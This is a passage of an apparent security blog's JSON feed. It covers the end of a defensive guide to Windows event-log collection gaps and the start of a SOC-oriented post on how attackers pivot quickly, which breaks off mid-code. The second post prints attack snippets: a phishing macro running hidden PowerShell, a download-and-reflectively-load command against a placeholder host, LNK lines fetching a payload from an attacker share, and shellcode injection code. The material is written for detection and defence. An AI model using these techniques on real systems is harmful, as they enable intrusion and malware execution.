plain\">events from that provider without any Event ID 1102, 4719, or 104 appearing.</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Detection: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Compare expected vs. actual event volumes (Section 6.2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Monitor for Sysmon Event ID 1 (process creation) with known ETW-patching</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  tool signatures in CommandLine field</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Check ETW session buffer loss counters (Section 1.2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">- Synthetic event injection will catch this (Section 6.3)</span><br></span></code></pre></div></div>\n<p>There is no single event that fires when ETW is patched in memory. Volume-based detection and synthetic injection are the only reliable detections.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-hardening-roadmap-fix-it-this-week\">Part 8  The Hardening Roadmap: Fix It This Week<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-8--the-hardening-roadmap-fix-it-this-week\" class=\"hash-link\" aria-label=\"Direct link to Part 8  The Hardening Roadmap: Fix It This Week\" title=\"Direct link to Part 8  The Hardening Roadmap: Fix It This Week\" translate=\"no\">​</a></h2>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-1-do-this-today\">Priority 1 (Do This Today)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-1-do-this-today\" class=\"hash-link\" aria-label=\"Direct link to Priority 1 (Do This Today)\" title=\"Direct link to Priority 1 (Do This Today)\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 1. Verify the audit policy override flag is set on all DCs and critical servers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Expected: \"Audit: Force audit policy...\" = Enabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Invoke-Command -ComputerName \"DC01\",\"DC02\",\"SERVER01\" -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $setting = secedit /export /cfg \"$env:TEMP\\secpol.cfg\" /quiet</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-String \"MACHINE\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\SCENoApplyLegacyAuditPolicy\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"$env:TEMP\\secpol.cfg\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 2. Check that process creation (4688) IS generating events on at least one DC</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$recent4688 = Get-WinEvent -ComputerName \"DC01\" -LogName Security `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -FilterXPath \"*[System[EventID=4688 and TimeCreated[timediff(@SystemTime) &lt;= 3600000]]]\" `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    -MaxEvents 5 -ErrorAction SilentlyContinue</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if (-not $recent4688) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"No 4688 events in last hour on DC01  audit policy not configured correctly\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># 3. Check command-line logging is enabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$cmdLineSetting = Invoke-Command -ComputerName \"DC01\" -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $path = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    (Get-ItemProperty -Path $path -Name \"ProcessCreationIncludeCmdLine_Enabled\" -EA SilentlyContinue).ProcessCreationIncludeCmdLine_Enabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">if ($cmdLineSetting -ne 1) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Warning \"Command-line logging NOT enabled on DC01  all 4688 events have empty CommandLine\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-2-this-week\">Priority 2 (This Week)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-2-this-week\" class=\"hash-link\" aria-label=\"Direct link to Priority 2 (This Week)\" title=\"Direct link to Priority 2 (This Week)\" translate=\"no\">​</a></h3>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Resize Security log on all DCs to 4GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$dcs = (Get-ADDomainController -Filter *).Name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($dc in $dcs) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Invoke-Command -ComputerName $dc -ScriptBlock {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Security /ms:4294967296        # 4GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Microsoft-Windows-Sysmon/Operational /ms:2147483648  # 2GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        wevtutil sl Microsoft-Windows-PowerShell/Operational /ms:1073741824  # 1GB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"$env:COMPUTERNAME log sizes updated\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-3-this-month\">Priority 3 (This Month)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#priority-3-this-month\" class=\"hash-link\" aria-label=\"Direct link to Priority 3 (This Month)\" title=\"Direct link to Priority 3 (This Month)\" translate=\"no\">​</a></h3>\n<p>Deploy the synthetic event injection test as a scheduled task on 10 representative hosts (DCs, critical servers, sample workstations). Run every 4 hours. Alert in SIEM if any marker is absent after 15 minutes. This gives you continuous, automated validation of collection fidelity  the metric that turns this from a one-time audit into an ongoing operational control.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-complete-gap-inventory-what-to-check-and-how\">The Complete Gap Inventory: What to Check and How<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#the-complete-gap-inventory-what-to-check-and-how\" class=\"hash-link\" aria-label=\"Direct link to The Complete Gap Inventory: What to Check and How\" title=\"Direct link to The Complete Gap Inventory: What to Check and How\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Gap</th><th>Detection Method</th><th>Tool</th><th>Time to Verify</th></tr></thead><tbody><tr><td>Audit policy not generating events</td><td>auditpol /get /category:*</td><td>auditpol.exe</td><td>5 min per host</td></tr><tr><td>Legacy/advanced policy conflict</td><td>Check for SCENoApplyLegacyAuditPolicy=0</td><td>secedit / registry</td><td>10 min</td></tr><tr><td>Command-line logging disabled</td><td>Registry check</td><td>PowerShell</td><td>2 min per host</td></tr><tr><td>Log sizes too small</td><td>wevtutil gl Security</td><td>wevtutil.exe</td><td>2 min per host</td></tr><tr><td>WEF subscription filter errors</td><td>Test XPath with Get-WinEvent -FilterXPath</td><td>PowerShell</td><td>15 min</td></tr><tr><td>WEC server dropping events</td><td>ETW Buffers Lost performance counter</td><td>Get-Counter</td><td>10 min</td></tr><tr><td>WEF delivery mode too slow</td><td>wecutil gs &lt;subscription&gt; DeliveryMaxLatency</td><td>wecutil.exe</td><td>5 min</td></tr><tr><td>Stale WEF sources</td><td>wecutil gr &lt;subscription&gt; LastHeartbeat</td><td>wecutil.exe</td><td>15 min</td></tr><tr><td>EventRecordID gaps in SIEM</td><td>Compare source RecordId vs. SIEM query</td><td>PowerShell + SIEM</td><td>30 min</td></tr><tr><td>Volume baseline deviation</td><td>SIEM query comparing last hour to 7-day avg</td><td>SIEM</td><td>Ongoing</td></tr><tr><td>Audit log cleared (1102)</td><td>Alert rule in SIEM</td><td>SIEM</td><td>Deploy now</td></tr><tr><td>Audit policy tampered (4719)</td><td>Alert rule in SIEM</td><td>SIEM</td><td>Deploy now</td></tr><tr><td>ETW tampering</td><td>Synthetic injection test</td><td>Scheduled PowerShell</td><td>Deploy weekly</td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Learn: \"Use Windows Event Forwarding to help with intrusion detection\"</li>\n<li class=\"\">Palantir: windows-event-forwarding GitHub repository  production WEF architecture</li>\n<li class=\"\">Elastic: \"The Essentials of Central Log Collection with WEF/WEC\"</li>\n<li class=\"\">MITRE ATT&amp;CK T1562.002: Impair Defenses  Disable Windows Event Logging</li>\n<li class=\"\">MITRE ATT&amp;CK T1070.001: Indicator Removal  Clear Windows Event Logs</li>\n<li class=\"\">Microsoft Learn: Event ID 1102 and 4719 documentation</li>\n<li class=\"\">NSA/CISA: \"Windows Event Logging and Forwarding\" (NSA-CSI-18-130)</li>\n<li class=\"\">Malware Archaeology: Windows Logging Cheat Sheet v2019</li>\n<li class=\"\">Roberto Rodriguez (Cyb3rWard0g): ThreatHunter-Playbook  ETW research</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/network-forensics-lateral-movement-dns-netflow-auth-logs\">Network Forensics Without a Tap</a>  when event logs are disabled or cleared, reconstruct movement from DNS, NetFlow, and DHCP</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>  the specific Event IDs that expose each stage of an APT attack chain</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>  cloud identity events that require separate collection pipelines from on-prem logs</li>\n</ul>\n<hr>\n<p><em>All commands in this post are standard Windows administrative utilities and PowerShell built-ins. They operate on logs you have administrative access to. This is a defensive operations guide.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events",
            "title": "Windows Event Log Architecture: Why Your SIEM Is Probably Missing 30% of Events and How to Verify It",
            "summary": "The 10 failure points across 4 layers where Windows events silently disappear before reaching your SIEM  and the scripts to measure your actual collection fidelity.",
            "date_modified": "2026-04-18T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "detection-engineering",
                "soc-operations",
                "windows-security",
                "event-logging",
                "siem",
                "wef",
                "audit-policy",
                "etw"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours",
            "content_html": "<blockquote>\n<p><em>You're staring at an EDR alert from 11:47 PM. A Word document spawned PowerShell. By the time your analyst acknowledges the ticket at 12:09 AM, the attacker already has a beacon calling home, has run BloodHound across your entire AD, dumped credentials from LSASS, and is authenticating to your domain controller with a Domain Admin hash. The \"200-day dwell time\" you quoted last quarter's board meeting is about to become a footnote. This intrusion will be over in four hours.</em></p>\n</blockquote>\n<p><strong>Category:</strong> Threat Intelligence · <strong>Reading time:</strong> 25 min · <strong>Audience:</strong> SOC Analysts, Detection Engineers, Incident Responders</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-1--the-4-hour-clock-why-dwell-time-statistics-are-killing-your-security-posture\">Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-1--the-4-hour-clock-why-dwell-time-statistics-are-killing-your-security-posture\" class=\"hash-link\" aria-label=\"Direct link to Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture\" title=\"Direct link to Section 1  The 4-Hour Clock: Why Dwell Time Statistics Are Killing Your Security Posture\" translate=\"no\">​</a></h2>\n<p>The \"197-day average dwell time\" figure has been cited in board decks and budget justifications for a decade. It is not wrong  it is simply irrelevant to how modern targeted intrusions unfold.</p>\n<p>That average is anchored by two outlier scenarios: low-sophistication actors who establish persistence and sit idle, and nation-state espionage campaigns deliberately designed for long-term quiet collection. Neither describes your ransomware operator, your financially motivated eCrime group, or an actor running a targeted smash-and-grab on intellectual property.</p>\n<p>The metric that matters for defenders is <strong>breakout time</strong>  elapsed time from an adversary gaining initial access on the first host to beginning lateral movement to a second host. Industry reporting from 2024 puts the median at <strong>62 minutes</strong>. The fastest recorded case was under <strong>3 minutes</strong>.</p>\n<p>This single statistic should reshape how you think about every SLA in your SOC.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-the-timeline-actually-looks-like\">What the Timeline Actually Looks Like<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#what-the-timeline-actually-looks-like\" class=\"hash-link\" aria-label=\"Direct link to What the Timeline Actually Looks Like\" title=\"Direct link to What the Timeline Actually Looks Like\" translate=\"no\">​</a></h3>\n<p>The following is a composite timeline reconstructed from multiple public DFIR reports, combining elements from documented intrusions by groups including SCATTERED SPIDER, Cl0p affiliates during the MOVEit campaign, and ALPHV/BlackCat operators. No single engagement will match this exactly, but every element below has been observed in documented intrusions within the timeframes noted.</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-your-current-slas-cannot-keep-up\">Why Your Current SLAs Cannot Keep Up<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#why-your-current-slas-cannot-keep-up\" class=\"hash-link\" aria-label=\"Direct link to Why Your Current SLAs Cannot Keep Up\" title=\"Direct link to Why Your Current SLAs Cannot Keep Up\" translate=\"no\">​</a></h3>\n<p>If your P1 acknowledgment SLA is 15 minutes and your containment SLA is 4 hours, you are structurally incapable of preventing lateral movement against an adversary operating on this timeline. The math does not work, and tuning detections without addressing response velocity is rearranging deck chairs.</p>\n<p>This is not an argument for panic  it is an argument for <strong>automated containment triggers on specific high-confidence events</strong>, rather than relying on human-in-the-loop for every step of the response chain.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-2--technical-anatomy-of-a-fast-pivot\">Section 2  Technical Anatomy of a Fast Pivot<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-2--technical-anatomy-of-a-fast-pivot\" class=\"hash-link\" aria-label=\"Direct link to Section 2  Technical Anatomy of a Fast Pivot\" title=\"Direct link to Section 2  Technical Anatomy of a Fast Pivot\" translate=\"no\">​</a></h2>\n<p>Speed comes from tooling that has been refined over years of red team and criminal operator use. Here is exactly what the execution looks like at the command level.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-1-establishing-the-foothold\">Stage 1: Establishing the Foothold<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-1-establishing-the-foothold\" class=\"hash-link\" aria-label=\"Direct link to Stage 1: Establishing the Foothold\" title=\"Direct link to Stage 1: Establishing the Foothold\" translate=\"no\">​</a></h3>\n<p><strong>Macro-based initial access (still common in targeted attacks):</strong></p>\n<div class=\"language-vba codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-vba codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">' Embedded in .doc / .xlsm delivered via phishing</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Sub AutoOpen()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Dim wsh As Object</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Set wsh = CreateObject(\"WScript.Shell\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ' Download and execute in-memory via PowerShell</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    wsh.Run \"powershell -nop -w hidden -enc \" &amp; Base64EncodedPayload, 0, False</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">End Sub</span><br></span></code></pre></div></div>\n<p>The encoded payload typically resolves to something like:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Decoded: download and reflectively load a beacon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$data = (New-Object System.Net.WebClient).DownloadData('https://cdn-update[.]com/update.bin')</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$asm = [System.Reflection.Assembly]::Load($data)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$asm.EntryPoint.Invoke($null, $null)</span><br></span></code></pre></div></div>\n<p>Nothing touches disk. The beacon is loaded into the PowerShell process memory space directly.</p>\n<p><strong>ISO/LNK delivery (bypasses Mark-of-the-Web):</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># LNK target field (visible in properties or forensic tools):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\cmd.exe /c start \\\\attacker-host\\share\\payload.dll</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR via GLOBALROOT UNC (bypasses drive-letter path checks):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\cmd.exe /c start \\\\?\\GLOBALROOT\\Device\\Mup\\attacker-host\\share\\payload.dll</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># OR simpler:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">C:\\Windows\\System32\\rundll32.exe payload.dll,EntryPoint</span><br></span></code></pre></div></div>\n<p>ISO files mounted by double-click in Windows 10/11 do not inherit MOTW from the container, so SmartScreen and Attachment Manager do not flag the contents.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"stage-2-process-injection--getting-out-of-the-initial-process\">Stage 2: Process Injection  Getting Out of the Initial Process<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#stage-2-process-injection--getting-out-of-the-initial-process\" class=\"hash-link\" aria-label=\"Direct link to Stage 2: Process Injection  Getting Out of the Initial Process\" title=\"Direct link to Stage 2: Process Injection  Getting Out of the Initial Process\" translate=\"no\">​</a></h3>\n<p>Staying inside <code>WINWORD.EXE</code> or <code>powershell.exe</code> is noisy. The first task after payload execution is migrating into a less suspicious process.</p>\n<p><strong>Classic CreateRemoteThread injection (loud, still used by lower-tier actors):</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-c codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\">// Attacker-side: inject shellcode into target PID</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hProc </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">OpenProcess</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">PROCESS_ALL_ACCESS</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> FALSE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> targetPID</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">LPVOID mem </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">VirtualAllocEx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                             MEM_COMMIT </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> MEM_RESERVE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> PAGE_EXECUTE_READWRITE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">WriteProcessMemory</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> mem</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcode</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> shellcodeLen</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">HANDLE hThread </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">CreateRemoteThread</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">hProc</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                                    </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">LPTHREAD_START_ROUTINE</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\">mem</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token constant\" style=\"color:hsl(212, 92%, 35%)\">NULL</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">;</span><br></span></code></pre></div></div>\n<p>This generates Sysmon Event ID 8 (CreateRemoteThread)  detectable if you are collecting it.</p>\n<p><strong>Process hollowing (more evasive):</strong></p>\n<div class=\"language-c codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" 